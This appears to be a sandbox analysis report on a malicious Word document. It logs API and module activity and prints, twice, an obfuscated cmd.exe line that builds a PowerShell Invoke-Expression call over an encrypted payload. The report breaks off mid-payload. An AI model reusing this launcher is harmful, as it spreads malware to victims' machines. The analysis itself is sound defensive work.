| Create | Cmd uokQarPiXkRo TulEVCqHjGVGZiAowD qTzHstoNw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %XGUfViTjCEjwSVO%=ZHGHTLTuB&&set %DAXAIPvZQicL%=p&&set %vwiYoBzE%=o^w&&set %NwmclOIWlPPfrXs%=YtuPEnjH&&set %mESEbjHwWp%=!%DAXAIPvZQicL%!&&set %zkOiRaLmZdHljEQ%=XajFzihkNzuSY&&set %YJwaSiYTQtqK%=e^r&&set %pflmiDDErkSdkk%=!%vwiYoBzE%!&&set %fTvSPumjwc%=s&&set %iwaQfiAAaFLEdGO%=GdUcFsiGa&&set %iwpiikIEcScOE%=he&&set %zRBwSiVAaTKc%=ll&&!%mESEbjHwWp%!!%pflmiDDErkSdkk%!!%YJwaSiYTQtqK%!!%fTvSPumjwc%!!%iwpiikIEcScOE%!!%zRBwSiVAaTKc%! "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl]::PtRtOsTRiNgbstr([runtimE.INtEROPSerVIcEs.MarsHAl]::seCuRestRiNgTobstR($('76492d1116743f0423413b16050a5345MgB8AG0AdABWAHUAYwA1AFUAWQB2ADgAZgBOAGUASgBHAE4AegAwAFUATQBnAEEAPQA9AHwAYgAyAGIANQBiADgAMABkADMAYQBjAGIAYQA2ADgAOQAxADEAMAA4AGEAZQBjADEAZQBmADkANgAwADUAOQBjAGQANwA1AGYAOAA1ADIAMgAzAGYAMABlAGQAOQA2ADcAZgA1ADEAMAAzADQAZAA0ADAAZgBlADQANAA4ADAANAA1AGIAZQAxADMAMQAwAGYAMgA0ADgAZQA4ADUAZgAxADIAOAAyAGMAOQAwADkANAAzADUANgBlAGEAYwAzADIAOQBhADIANgAxAGEAOQBjAGYANQAyAGUAOABiAGIANQBiADkAMwA3AGYAYQA4ADkAOQBmADYAOAA2AGIANwBiADQAYwA1AGIAOQBiADQAMQA5AGUAZQAwADgAYgAzADEANQA1ADEAZQA3ADkAZABkADQAMQAzADgAZQBhADAAMgA2AGQAZABhADEAOABkAGIAMQBiADEAOABhAGEAMAA2AGIAYwA2AGIAMwA3AGQAZgA4AGYAOQAzAGIANwBjADIAMgAyAGMAOABlADIAMgAyAGUAOAA0AGYAYwBjADMAYwA3ADAAZQAxADUAYQA4ADAAMQBhADIAMwA0ADYAYwBmAGMAYwBjAGQAMwBmADgAMQBiAGYAZABkADAAMwBmADgANwBmAGIANABlADkANQBhADcAMQA0ADQAZAA5ADcANQAzAGQANQBiAGMAOAAyAGEAYwAwADAAMwA5ADcAYwA2AGMANAAwADIAZAAzADEAYQAxADcAYQAyADQAYgBlADQAZQA4ADcAZQBmAGMAYgBiADcAMAAzAGUANAA1ADMAZgBjADAAZQAwAGEAZQAxAGEAOAA1ADEAYgA4AGUAMABhADQAOAA1AGMANgA1AGUAZAA2ADUAMwAzAGUAOQAwADMAYgA2ADMAZQBlAGQAZQA2ADEANQAwADkAZgBmAGQANgA3ADQANAA2AGEAMAA3AGQAZgBjADMAZAA1AGIAYgA1ADkAZgBjAGMAYgBlADgAOAAxAGUAOQBiAGEAZgBiADQAYwBiADEAOQA3ADcAYQBhAGMAZgBlAGQAMAA5AGUAYQAxAGYAMQAyAGIANwAwADEAMABiAGYAMwA1ADQAMQBiAGMAOQBiADIAZQA5AGIANABkADYAZAA5ADYAZgA3ADYAYgA1ADQAMQBlADQANQBmADYAMQA0ADcANQBlADEAZQBiADgAMwA3AGQANgA0ADUAZgAyADUAMwA1ADAAYQA1AGIANgA5ADUANwAyAGQAZQA0AGIAYwA1AGYAYQBiADIANwBmADgAMABmADkAOABiAGMANQA4ADcANABkAGEANgAzAGUAMwBhADgAMQAzADEANwBkADkAOABjADAAZQA1ADUAYQA2ADIAYwAxADAANQBjADUAZgBhADkAZAA3AGEANgA4ADcAMQA2ADgAYwBmAGEAMgBkADkAYgA4AGIAYgAyAGQAOAA0ADQAZQAyADYAMAA3AGEAMQAyADQAMABmADMAYgBhAGMAZABjAGIAYwBhAGEANwBjADkAOQA3ADYANQBhADUAYgBjADMANwBkADQAZgBiADkAMgBkAGIAMAAzADkANAAzADUANwAxADgAZgAwADMAOAAxAGYAMwBjADcAYQA5ADAAMAA5ADAAMgAyAGEAZAAwAGUAOAA2ADMANwBlAGQAYQA1ADcAOABmAGEANwA2ADkANgAxADQAYgBlAGQAYQAzADIAZgA5AGUAMgA0ADIAMQA2ADgAMwBjADgANQA1ADkAOQAxADIANgA5ADYAMwA2ADgAYgA1ADAAOQBhADYANABhADYAMQBiADkAMgA5AGQAYgBjADkAYwBhADkANgA5ADcAMAAzAGMANQBhADIAMAA5AGEAYwBiADYAZAAyADUAZQAxADcAMABjAGEANgBkAGYAYwBkADAAYwBhAGUAMABjAGQAYgAzAGQAZABjAGYAZAA2AGYANQAxADQAYQA0AGYANAAyAGYAYQAxADEANgBkADQAYwA0ADgAOABmAGQAOAAwAGEAZgA3AGUAOAAxADIAYgBiAGMAMwA2ADQAMABkADAAMQAyAGIAZABhADgAYQBmADIANAAyADMAOABjAGUANAAyADMAYQBjAGYANgA0AGEAYwBjAGIAMwAxAGUANQBmADEANwBmAGQAYQBmAGIAZgBiADcAYwAxADUAYwBiAGUAMABmADkANwBiADIAOQAyAGIAYwAxAGMAYgAwADEAMgA5ADMAYQBhAGIANwA4AGYAYQA5ADEAMQBiADkAYwBiAGQAYQAwAGMAMwBkAGQAZABmADkAOQA2ADMAMQBmADYAYwA5ADQANgBkAGEANgBlAGIAYQBmADQAMQAzADIAMwA4AGMANQA1AGYAMgAzAGYAZAAxADIAYQAzAGYAMAA3AGIAOABkAGYANwA5ADkAZgAyADUAMwAxAGIAOQA3ADYANQA1AGIANABlAGIAMAA3ADMAMwBmAGYANwA0AGYAOQBlADgAZQBkAGQANgA2ADcAOABmADcAZABmADYAYgAzADIAMwA0ADEAMQA4ADkAYwBmADMAZQBmADIANQAwADYAYwAyAGUAZgA4AGQAOQBhADcAMAA0ADkANwBmAGIANQBjADUANwAzADMAZgBlADcAZAAyAGMAMQBhADgANgA0ADgAZQBmAGMAYQAzADQAMwBkADUAMgA5AGYANwA5AGUANQAwADkAZQA5ADIAZQAyADMAMQAyADkANQA2AGEAZABhADQAZAAyADIAZAAxAGUAOAAzAGQANwBlAGMAZgA0ADMANQA4AGUAZgBjAGMANAA2ADcAYgA5ADYAOQAyAGYAMgAxAGIAOQA2ADkAOQA3ADYAZgAwADUAZgBhAGUANABiADgANQA4ADQAMgA0ADMAMABmAGIAZAA4ADAANgAzAGUAOAAxAGYAYgA3AGUAMQA4AGUANgA5ADEAZgBiADUAYQA1AGMAOABjADAAMwBjAGIAOQA4ADUANABlADkAOAA2ADMAZgBjAGMAYwBkAGEAYwA0ADMAZAA2ADMAZQAyADcAYwAyAGIANABlAGEAMQBlAGMANwAyADkAOABjADcAYwAxADUAZgAxADYANgBkADkAYwA1AGMAYgBiADkAOQBjAGQAYwA2AGIANgBhADQAYwA1ADMAMQAzAGUAMAAzAGEAYQA3AGEANgA2AGUAZQBmADMAYQBmADUANwA0ADUAZgA1ADMAMAAwADUAZAA4ADQAOQA0AGMAYwBlADQAYgA1ADQANAA0AGEAMQA1ADMAOQBiADUAZAA5ADQAMQBlAGUANwAyAGUAOQA3ADQANQBiAGEANwA4ADcANQAzADMANwA1ADMAYQBmAGQAYwBiADMAYwA2AGMAOAAxAGMAYwA5AGUAOAAwAGMAZQBmAGEANgA3AGIAMQAyAGEAMQA5AGEANwA2AGIAMwA4AGUAMgA1AGYANQBmADgAZAA2ADcANgBkAGQAMAA0ADMAMAA3ADkAOAA3ADQAMwAzADAAYgAwADgAZgBhADQAMgAyADcAZgAwADIAYgA2ADgAOAA1ADgAZAA2AGEAYQAyAGIAOABiADMANAAzAGIAOQA1ADAAMAAyAGQANQBiADAAMgBkADUAYgA3ADcAZQAxADIAOQAwADcANwAwAGUAMgBiADcANAAxAGYAZgA3ADkAMwBjADEAOAAxADEAOQA3AGMAZgBiADIANgA4ADEAZgBkADIAOABmADcAZQA3ADUAOAA5AGQAYwA3ADUAZAAzADAAOQBhAGIANwBmAGIAMQBlAGIAZgAxADEAYQBiADMAZQAxAGUAMAA4ADEANwA2ADAAOQAyAGIAMwBlADAAMABhADIAOQBiADUAYgBhADkAYwA0AGUAOQA0ADcAZgAzADYAZQAyADAAYwBkADEAMgA4ADIAMABlAGMAZgAzADIANwBkAGIAOQBjADYAYwA5ADQAYwAzADIAMgBkADcAZgA2AGEAMgA4ADEAOAAyADIAZAA0ADMAMgBmADUAMABlADkAYwAwAGUANwBjAGIANwAwAGMAYgAzAGMAZQBiAGQAYgBiAGUAYwA3ADQANwA3ADIAMwAzADUA' | CoNveRTto-seCURestrING -Ke (222..207)) ) ))) | - |
|
1 |
Module (166)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefb970000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee27f0000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fef5c80000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7fefe910000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee2fd0000 |
|
15 | |
| Get Handle | c:\program files\microsoft office\root\office16\winword.exe | base_address = 0x13ff20000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fef9b60000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x76df0000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7fefe910000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
4 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fef9be3b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fef9bda13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fef9be1618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fef9bdf088 |
|
1 | |
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee28f72c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee28660b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee2811a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee2865f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee280f000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee27fe860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee27f3fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee2802380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee27f7b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee27f7b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee27f8730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee2933260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee2933280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee2801f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee2866370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee2854590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee27f55b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee2800240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee27f3d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee27f6d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee27f3d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee27fe6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee27fdf40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee27f7bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee27ffcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee27f8b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee28f2ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee28042c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee27f3e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee27fab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee27fa7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee27f1550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee27fe830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee27f13d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee27f6660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee27f1500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee27f3dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee28f71e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee28c6d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee29398e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee2939830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7fefe911320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7fefe91f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7fefe96caa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7fefe9a1760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7fefe93c760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7fefe96ecd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7fefe96e840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7fefe97f420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7fefe974ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7fefe979350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7fefe946e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7fefe91a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7fefe97f320 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x76e094f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x76e05f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x76e02b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x76dfab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x76e05c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x76dfa730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x76dfa5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7fefe912270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7fefe99dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7fefe915c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7fefe916330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7fefe9366c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7fefe914710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7fefe9148f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7fefe94b640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7fefe94b360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7fefe952640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7fefe9358a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7fefe935820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7fefe94af20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7fefe96a0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7fefe9a2160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7fefe935af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7fefe935a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7fefe935a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7fefe935a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7fefe9160b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7fefe913e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7fefe969f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7fefe999b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7fefe999aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7fefe999990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7fefe999890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7fefe999770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7fefe97b8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7fefe97b800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7fefe9948e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7fefe999470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7fefe9996a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7fefe992fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7fefe999cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7fefe998ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7fefe999c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7fefe998e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7fefe993690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7fefe9992d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7fefe992e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7fefe993f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7fefe9991a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7fefe977c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7fefe977a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7fefe977890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7fefe977ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7fefe999600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7fefe9776a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7fefe9983f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7fefe943070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7fefe94d700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7fefe94d890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7fefe92caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7fefe938a00 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee27ffcd0 |
|
1 | |
| Get Address | Unknown module name | function = 714, address_out = 0x7fee32e3a44 |
|
3 | |
| Get Address | Unknown module name | function = 712, address_out = 0x7fee3359db0 |
|
3 | |
| Get Address | Unknown module name | function = 632, address_out = 0x7fee313d6f0 |
|
3 | |
| Get Address | Unknown module name | function = 608, address_out = 0x7fee313ae28 |
|
3 | |
| Get Address | Unknown module name | function = 716, address_out = 0x7fee33124c8 |
|
3 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (31)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 825, y_out = 125 |
|
2 | |
| Get Cursor | x_out = 471, y_out = 294 |
|
1 | |
| Get Time | type = System Time, time = 2018-03-29 15:42:36 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 97329 |
|
1 | |
| Get Time | type = Local Time, time = 2018-03-29 15:42:46 (Local Time) |
|
4 | |
| Get Time | type = Local Time, time = 2018-03-29 15:42:47 (Local Time) |
|
9 | |
| Get Time | type = Ticks, time = 180805 |
|
9 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: cmd.exe
126
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" uokQarPiXkRo TulEVCqHjGVGZiAowD qTzHstoNw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %XGUfViTjCEjwSVO%=ZHGHTLTuB&&set %DAXAIPvZQicL%=p&&set %vwiYoBzE%=o^w&&set %NwmclOIWlPPfrXs%=YtuPEnjH&&set %mESEbjHwWp%=!%DAXAIPvZQicL%!&&set %zkOiRaLmZdHljEQ%=XajFzihkNzuSY&&set %YJwaSiYTQtqK%=e^r&&set %pflmiDDErkSdkk%=!%vwiYoBzE%!&&set %fTvSPumjwc%=s&&set %iwaQfiAAaFLEdGO%=GdUcFsiGa&&set %iwpiikIEcScOE%=he&&set %zRBwSiVAaTKc%=ll&&!%mESEbjHwWp%!!%pflmiDDErkSdkk%!!%YJwaSiYTQtqK%!!%fTvSPumjwc%!!%iwpiikIEcScOE%!!%zRBwSiVAaTKc%! "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl]::PtRtOsTRiNgbstr([runtimE.INtEROPSerVIcEs.MarsHAl]::seCuRestRiNgTobstR($('76492d1116743f0423413b16050a5345MgB8AG0AdABWAHUAYwA1AFUAWQB2ADgAZgBOAGUASgBHAE4AegAwAFUATQBnAEEAPQA9AHwAYgAyAGIANQBiADgAMABkADMAYQBjAGIAYQA2ADgAOQAxADEAMAA4AGEAZQBjADEAZQBmADkANgAwADUAOQBjAGQANwA1AGYAOAA1ADIAMgAzAGYAMABlAGQAOQA2ADcAZgA1ADEAMAAzADQAZAA0ADAAZgBlADQANAA4ADAANAA1AGIAZQAxADMAMQAwAGYAMgA0ADgAZQA4ADUAZgAxADIAOAAyAGMAOQAwADkANAAzADUANgBlAGEAYwAzADIAOQBhADIANgAxAGEAOQBjAGYANQAyAGUAOABiAGIANQBiADkAMwA3AGYAYQA4ADkAOQBmADYAOAA2AGIANwBiADQAYwA1AGIAOQBiADQAMQA5AGUAZQAwADgAYgAzADEANQA1ADEAZQA3ADkAZABkADQAMQAzADgAZQBhADAAMgA2AGQAZABhADEAOABkAGIAMQBiADEAOABhAGEAMAA2AGIAYwA2AGIAMwA3AGQAZgA4AGYAOQAzAGIANwBjADIAMgAyAGMAOABlADIAMgAyAGUAOAA0AGYAYwBjADMAYwA3ADAAZQAxADUAYQA4ADAAMQBhADIAMwA0ADYAYwBmAGMAYwBjAGQAMwBmADgAMQBiAGYAZABkADAAMwBmADgANwBmAGIANABlADkANQBhADcAMQA0ADQAZAA5ADcANQAzAGQANQBiAGMAOAAyAGEAYwAwADAAMwA5ADcAYwA2AGMANAAwADIAZAAzADEAYQAxADcAYQAyADQAYgBlADQAZQA4ADcAZQBmAGMAYgBiADcAMAAzAGUANAA1ADMAZgBjADAAZQAwAGEAZQAxAGEAOAA1ADEAYgA4AGUAMABhADQAOAA1AGMANgA1AGUAZAA2ADUAMwAzAGUAOQAwADMAYgA2ADMAZQBlAGQAZQA2ADEANQAwADkAZgBmAGQANgA3ADQANAA2AGEAMAA3AGQAZgBjADMAZAA1AGIAYgA1ADkAZgBjAGMAYgBlADgAOAAxAGUAOQBiAGEAZgBiADQAYwBiADEAOQA3ADcAYQBhAGMAZgBlAGQAMAA5AGUAYQAxAGYAMQAyAGIANwAwADEAMABiAGYAMwA1ADQAMQBiAGMAOQBiADIAZQA5AGIANABkADYAZAA5ADYAZgA3ADYAYgA1ADQAMQBlADQANQBmADYAMQA0ADcANQBlADEAZQBiADgAMwA3AGQANgA0ADUAZgAyADUAMwA1ADAAYQA1AGIANgA5ADUANwAyAGQAZQA0AGIAYwA1AGYAYQBiADIANwBmADgAMABmADkAOABiAGMANQA4ADcANABkAGEANgAzAGUAMwBhADgAMQAzADEANwBkADkAOABjADAAZQA1ADUAYQA2ADIAYwAxADAANQBjADUAZgBhADkAZAA3AGEANgA4ADcAMQA2ADgAYwBmAGEAMgBkADkAYgA4AGIAYgAyAGQAOAA0ADQAZQAyADYAMAA3AGEAMQAyADQAMABmADMAYgBhAGMAZABjAGIAYwBhAGEANwBjADkAOQA3ADYANQBhADUAYgBjADMANwBkADQAZgBiADkAMgBkAGIAMAAzADkANAAzADUANwAxADgAZgAwADMAOAAxAGYAMwBjADcAYQA5ADAAMAA5ADAAMgAyAGEAZAAwAGUAOAA2ADMANwBlAGQAYQA1ADcAOABmAGEANwA2ADkANgAxADQAYgBlAGQAYQAzADIAZgA5AGUAMgA0ADIAMQA2ADgAMwBjADgANQA1ADkAOQAxADIANgA5ADYAMwA2ADgAYgA1ADAAOQBhADYANABhADYAMQBiADkAMgA5AGQAYgBjADkAYwBhADkANgA5ADcAMAAzAGMANQBhADIAMAA5AGEAYwBiADYAZAAyADUAZQAxADcAMABjAGEANgBkAGYAYwBkADAAYwBhAGUAMABjAGQAYgAzAGQAZABjAGYAZAA2AGYANQAxADQAYQA0AGYANAAyAGYAYQAxADEANgBkADQAYwA0ADgAOABmAGQAOAAwAGEAZgA3AGUAOAAxADIAYgBiAGMAMwA2ADQAMABkADAAMQAyAGIAZABhADgAYQBmADIANAAyADMAOABjAGUANAAyADMAYQBjAGYANgA0AGEAYwBjAGIAMwAxAGUANQBmADEANwBmAGQAYQBmAGIAZgBiADcAYwAxADUAYwBiAGUAMABmADkANwBiADIAOQAyAGIAYwAxAGMAYgAwADEAMgA5ADMAYQBhAGIANwA4AGYAYQA5ADEAMQBiADkAYwBiAGQAYQAwAGMAMwBkAGQAZABmADkAOQA2ADMAMQBmADYAYwA5ADQANgBkAGEANgBlAGIAYQBmADQAMQAzADIAMwA4AGMANQA1AGYAMgAzAGYAZAAxADIAYQAzAGYAMAA3AGIAOABkAGYANwA5ADkAZgAyADUAMwAxAGIAOQA3ADYANQA1AGIANABlAGIAMAA3ADMAMwBmAGYANwA0AGYAOQBlADgAZQBkAGQANgA2ADcAOABmADcAZABmADYAYgAzADIAMwA0ADEAMQA4ADkAYwBmADMAZQBmADIANQAwADYAYwAyAGUAZgA4AGQAOQBhADcAMAA0ADkANwBmAGIANQBjADUANwAzADMAZgBlADcAZAAyAGMAMQBhADgANgA0ADgAZQBmAGMAYQAzADQAMwBkA